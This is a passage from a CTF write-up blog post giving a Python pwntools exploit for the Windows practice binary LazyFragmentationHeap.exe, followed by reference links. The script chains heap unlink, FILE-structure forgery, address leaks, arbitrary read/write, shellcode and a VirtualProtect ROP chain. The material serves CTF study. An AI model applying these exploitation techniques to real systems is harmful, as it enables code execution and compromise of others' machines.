    assert(self.heap_addr != 0)

    # hijack FILE struct
    # The exact slot holding the live FILE is unknown, so chunks 3 and 4 are
    # sprayed with copies of the forged structure.
    payload = "\x00" * 0x50 # padding
    payload += self.ctor_fake_file(self.array_addr + 0x28 * 5 + 0x20, 0) * 12
    self.edit(3, payload)
    payload = "\x00" * 0x40 # padding
    payload += self.ctor_fake_file(self.array_addr + 0x28 * 5 + 0x20, 0) * 7
    self.edit(4, payload)

def leak_text_base(self):
    """Leak the image base of the target into self.text_base.

    The read starts two bytes into the stored pointer, so the value is shifted
    left by 16 afterwards. Raises AssertionError on an implausible result.
    """
    # use fread to arbitrary write and read
    target_addr = self.heap_addr + 0xCFB2 - 0xCB50 # skip \x00\x00
    self.read_file(8, 0x8, p64(target_addr))
    self.show(6)
    self.text_base = u64(self.p.recvline()[:-2].ljust(8, "\x00")) << 16
    assert(self.text_base >> 24 != 0)

def leak_ucrtbase(self):
    """Leak the pointer stored at text_base + 0x30A0 and rebase it into self.ucrtbase."""
    target_addr = self.text_base + 0x30A0 # atoll_iat
    self.read_file(8, 0x8, p64(target_addr))
    self.show(6)
    self.ucrtbase = u64(self.p.recvline()[:-2].ljust(8, "\x00")) - 0x67A30

def leak_pioinfo(self):
    """Leak the low 16 bits of the pointer at ucrtbase + 0xF0980 into self.pioinfo_offset.

    Raises AssertionError when the leaked offset is zero.
    """
    target_addr = self.ucrtbase + 0xF0980 # ucrtbase!_pioinfo[0]
    self.read_file(8, 0x8, p64(target_addr))
    self.show(6)
    self.pioinfo_offset = u64(self.p.recvline()[:-2].ljust(8, "\x00")) & 0xFFFF
    assert(self.pioinfo_offset != 0)

def do_simple_leak(self):
    """Collect text_base, ucrtbase and the pioinfo offset, one fresh process per leak.

    Each run of the target is prepared, used for a single leak and closed
    again before the next one is started.
    """
    self.p = process("./LazyFragmentationHeap.exe")
    self.prepare()
    self.leak_text_base()
    self.p.close()

    self.p = process("./LazyFragmentationHeap.exe")
    self.prepare()
    self.leak_ucrtbase()
    self.p.close()

    self.p = process("./LazyFragmentationHeap.exe")
    self.prepare()
    self.leak_pioinfo()
    self.p.close()

def write_pioinfo(self):
    """Write the byte 0x09 at pioinfo + 0x38 to switch stdin to binary mode.

    The pioinfo address is rebuilt from the 64 KiB-aligned part of the current
    heap leak and the previously leaked low 16 bits.
    """
    self.prepare()
    pioinfo = (self.heap_addr >> 16 << 16) | self.pioinfo_offset
    self.read_file(6, 8, p64(pioinfo + 0x38))
    self.edit(6, "\x09") # change to binary mode

def unlink_attack(self):
    """Forge a freed header plus list pointers inside the overlap, then free chunk 4.

    The forged pointers are `array_addr + 0x28 * 4 + 0x20 - 0x8` and
    `array_addr + 0x28 * 4 + 0x20`, i.e. they reference a slot of the
    bookkeeping array.
    """
    self.create(0x3C8, 2)
    payload = "\x00" * 0x58 # padding
    payload += p64(self.ctor_heap_head(0x380, 0x0, 0x380, 0x0) ^ self.encoding) # fake victim chunk head (freed status)
    payload += p64(self.array_addr + 0x28 * 4 + 0x20 - 0x8) + p64(self.array_addr + 0x28 * 4 + 0x20)
    self.edit(2, payload)
    self.delete(4)

def arbitrary_write(self, addr, content, final_write=False):
    """Write `content` at `addr` through entry 7.

    Entry 6 is edited to re-arm itself and to rebuild entries 7 and 8:
    entry 7's buffer becomes `addr`, entry 8's buffer points back at entry 6's
    edit_status field. Unless `final_write` is true, entry 8 is then used to
    re-arm entry 6 so the primitive can be used again.
    """
    # | edit_status | buffer |
    payload = p64(0xDDAABEEF1ACD) + p64(self.array_addr + 0x28 * 5 + 0x18)
    # | exist_status | size | id | edit_status | buffer |
    payload += p64(0xDDAABEEF1ACD) + p64(0x378) + p64(7) + p64(0xDDAABEEF1ACD) + p64(addr)
    # | exist_status | size | id | edit_status | buffer |
    payload += p64(0xDDAABEEF1ACD) + p64(0x378) + p64(8) + p64(0xDDAABEEF1ACD) + p64(self.array_addr + 0x28 * 5 + 0x18)

    self.edit(6, payload)
    self.edit(7, content)

    if not final_write:
        # | edit_status | buffer |
        payload = p64(0xDDAABEEF1ACD) + p64(self.array_addr + 0x28 * 5 + 0x18)
        self.edit(8, payload)

def arbitrary_read(self, addr):
    """Return the (up to 8) bytes printed for `addr`, decoded as a little-endian u64.

    Entry 6 is edited so that entry 7's buffer becomes `addr`; entry 7 is
    shown, and entry 8 is then used to re-arm entry 6 for the next call.
    """
    # | edit_status | buffer |
    payload = p64(0xDDAABEEF1ACD) + p64(self.array_addr + 0x28 * 5 + 0x18)
    # | exist_status | size | id | edit_status | buffer |
    payload += p64(0xDDAABEEF1ACD) + p64(0x378) + p64(7) + p64(0xDDAABEEF1ACD) + p64(addr)
    # | exist_status | size | id | edit_status | buffer |
    payload += p64(0xDDAABEEF1ACD) + p64(0x378) + p64(8) + p64(0xDDAABEEF1ACD) + p64(self.array_addr + 0x28 * 5 + 0x18)

    self.edit(6, payload)
    self.show(7)
    value = u64(self.p.recvline()[:-2].ljust(8, "\x00"))

    # | edit_status | buffer |
    payload = p64(0xDDAABEEF1ACD) + p64(self.array_addr + 0x28 * 5 + 0x18)
    self.edit(8, payload)

    return value

def search_ret_addr(self):
    """Scan the stack downwards for the saved return address of printf.

    Starting at ``self.stack_end - 0x8`` and moving down eight bytes at a
    time, each qword is fetched with ``self.arbitrary_read`` and compared
    against ``self.text_base + 0x17C4``.  At most 0x200 slots are examined,
    the lowest one being ``self.stack_end - 0x1000``.

    Returns:
        The address of the first stack slot holding the expected value.

    Raises:
        AssertionError: if none of the examined slots matches.
    """
    expected = self.text_base + 0x17C4  # return address of printf
    top = self.stack_end - 0x8

    for offset in range(0, 0x1000, 8):
        address = top - offset
        if self.arbitrary_read(address) == expected:
            return address

    # Fail explicitly once the window is exhausted, rather than handing back
    # an address that never matched.
    raise AssertionError(
        "return address not found in the 0x1000 bytes below stack_end")

def write_shellcode(self):
    """Assemble the flag-reading shellcode and place it, plus the file name,
    in the binary's data segment.

    The shellcode calls four routines located at fixed offsets from
    ``self.ucrtbase`` (named ``_open``, ``_read``, ``_write`` and ``_exit``
    here): it opens the file name, reads 0x30 bytes into a scratch buffer,
    writes those bytes to descriptor 1 and exits with status 1.  The offsets
    are specific to one ucrtbase build - verify them against the target.

    Both the assembled code (at ``text_base + 0x5500``) and the string
    ``"./flag.txt"`` (at ``text_base + 0x5400``) are stored with
    ``self.arbitrary_write``.
    """
    _open = self.ucrtbase + 0xA5550
    _read = self.ucrtbase + 0x182A0
    _write = self.ucrtbase + 0x17BA0
    _exit = self.ucrtbase + 0x74630
    filename = self.text_base + 0x5400        # .data segment
    io_buffer = self.text_base + 0x5450       # .data segment
    shellcode_addr = self.text_base + 0x5500  # .data segment

    # args: rcx, rdx, r8, r9, (stack)
    # The exit status is therefore loaded into rcx, the first argument
    # register, like every other first argument in this stub.
    shellcode = r'''
open_file:
mov rdi, 0x%x
mov rcx, 0x%x
mov rdx, 0
call rdi

read_file:
mov rdi, 0x%x
mov rcx, rax
mov rdx, 0x%x
mov r8, 0x30
call rdi

write_file:
mov rdi, 0x%x
mov rcx, 1
mov rdx, 0x%x
mov r8, 0x30
call rdi

exit:
mov rdi, 0x%x
mov rcx, 1
call rdi
''' % (_open, filename, _read, io_buffer, _write, io_buffer, _exit)

    self.arbitrary_write(shellcode_addr, asm(shellcode))
    self.arbitrary_write(filename, "./flag.txt")

def write_rop(self):
    """Overwrite the located return address with a ROP chain that calls
    VirtualProtect and then jumps to the shellcode.

    The chain loads rcx/r8/r9 with one gadget and rdx with another, calls
    ``kernel32 + 0x1BC70`` (VirtualProtect) to make 0x1000 bytes starting at
    ``text_base + 0x5000`` PAGE_EXECUTE_READWRITE, and returns into
    ``text_base + 0x5500``.  It is written with ``final_write=True``.

    A simpler chain calling system("cmd.exe") through ucrtbase was tried but
    does not work because the LFH is already broken at this point.
    """
    data_segment = self.text_base + 0x5000
    shellcode_addr = data_segment + 0x500
    virtual_protect = self.kernel32 + 0x1BC70
    # pop rcx ; pop r8 ; pop r9 ; pop r10 ; pop r11 ; ret
    pop_rcx_r8_r9_r10_r11 = self.ntdll + 0x8c551
    # pop rdx ; pop r11 ; ret
    pop_rdx_r11 = self.ntdll + 0x8C557

    # jmp shellcode
    chain = [
        pop_rcx_r8_r9_r10_r11,
        data_segment,           # rcx: start of the region to re-protect
        0x40,                   # r8:  0x40 is PAGE_EXECUTE_READWRITE
        data_segment + 0xA00,   # r9:  writable slot for the old protection
        0,                      # r10: filler
        0,                      # r11: filler
        pop_rdx_r11,
        0x1000,                 # rdx: size of the region
        0,                      # r11: filler
        virtual_protect,
        shellcode_addr,         # VirtualProtect returns into the shellcode
    ]
    payload = b"".join([p64(qword) for qword in chain])

    self.arbitrary_write(self.ret_address_in_stack, payload, final_write=True)

def do_attack(self):
    """Run the complete exploit against a fresh LazyFragmentationHeap.exe.

    Steps, in order: patch pioinfo, perform the unlink, set up array entry 6
    through chunk 5, leak the kernel32 / ntdll / PEB / TEB / stack
    addresses with the arbitrary-read primitive, locate the return address
    on the stack, store the shellcode and finally write the ROP chain.
    """
    self.p = process("./LazyFragmentationHeap.exe")
    self.write_pioinfo()

    # let chunk 5 point to itself
    self.unlink_attack()

    magic = 0xDDAABEEF1ACD  # value used for both exist_status and edit_status
    self_ptr = self.array_addr + 0x28 * 5 + 0x18
    # | exist_status | size | id | edit_status | buffer |
    entry6 = p64(magic) + p64(0x378) + p64(6) + p64(magic) + p64(self_ptr)
    self.edit(5, "A" * 0x8 + entry6)

    # do arbitrary read and write
    # GetCurrentProcessId_iat in binary
    pid_iat = self.arbitrary_read(self.text_base + 0x3028)
    self.kernel32 = pid_iat - 0x24890

    # atol_iat in kernel32
    atol_iat = self.arbitrary_read(self.kernel32 + 0x82888)
    self.ntdll = atol_iat - 0x8CBC0

    # ntdll!PebLdr - 0x78
    # NOTE(review): the note above says 0x78 but 0x80 is subtracted below -
    # confirm which is intended.
    peb_leak = self.arbitrary_read(self.ntdll + 0x16A448)
    self.PEB = peb_leak - 0x80
    self.TEB = self.PEB + 0x1000

    # Read starting one byte into the field at TEB + 0x10 and shift back,
    # presumably because its low byte is zero and would end the leak early
    # - confirm.
    stack_leak = self.arbitrary_read(self.TEB + 0x11)
    self.stack_end = (stack_leak << 8) + 0x3000

    # find where return address lies
    self.ret_address_in_stack = self.search_ret_addr()

    # write shellcode
    self.write_shellcode()

    # write ROP
    self.debug()
    self.write_rop()

def show_info(self):
    """Print every address and offset recovered by the attack, in hex.

    One line is printed per attribute, in the fixed order listed below.
    """
    # (format string, attribute name); attributes are looked up lazily so
    # lines are printed one at a time, in order.
    rows = (
        ("[+] encoding is: %s ", "encoding"),
        ("[+] heap_base is: %s ", "heap_addr"),
        ("[+] text_base is: %s ", "text_base"),
        ("[+] ucrtbase is: %s ", "ucrtbase"),
        ("[+] pioinfo[0] offset is: %s ", "pioinfo_offset"),
        ("[+] kernel32 is: %s ", "kernel32"),
        ("[+] ntdll is: %s ", "ntdll"),
        ("[+] PEB is: %s ", "PEB"),
        ("[+] TEB is: %s ", "TEB"),
        ("[+] stack_end is: %s ", "stack_end"),
        ("[+] ret_address_in_stack is: %s ", "ret_address_in_stack"),
    )
    for fmt, attr in rows:
        print(fmt % hex(getattr(self, attr)))

if __name__ == "__main__":
    # Script entry point: build the exploit driver and run it.
    Attack().run()

参考链接

  1. https://whereisk0shl.top/hitb_gsec_ctf_babyshellcode_writeup.html
  2. https://bbs.pediy.com/thread-221016.htm
  3. http://www.jbox.dk/sanos/source/win32/msvcrt/except.c.html
  4. https://whereisk0shl.top/post/hitb_gsec_ctf_babystack_writeup
  5. https://www.anquanke.com/post/id/188170
  6. https://www.anquanke.com/post/id/188170#h3-4
  7. https://www.cnblogs.com/lanrenxinxin/p/4631836.html
  8. https://b0ldfrev.gitbook.io/note/windows_operating_system/windowsseh-li-yong
  9. http://sjc1-te-ftp.trendmicro.com/assets/wp/exploring-control-flow-guard-in-windows10.pdf
  10. https://xz.aliyun.com/t/2587
  11. https://github.com/scwuaptx/LazyFragmentationHeap
  12. http://blog.eonew.cn/archives/1253#more-1253
Author: Nop
Link: https://n0nop.com/2021/04/20/BUUOJ-%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-Windows-Pwn/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.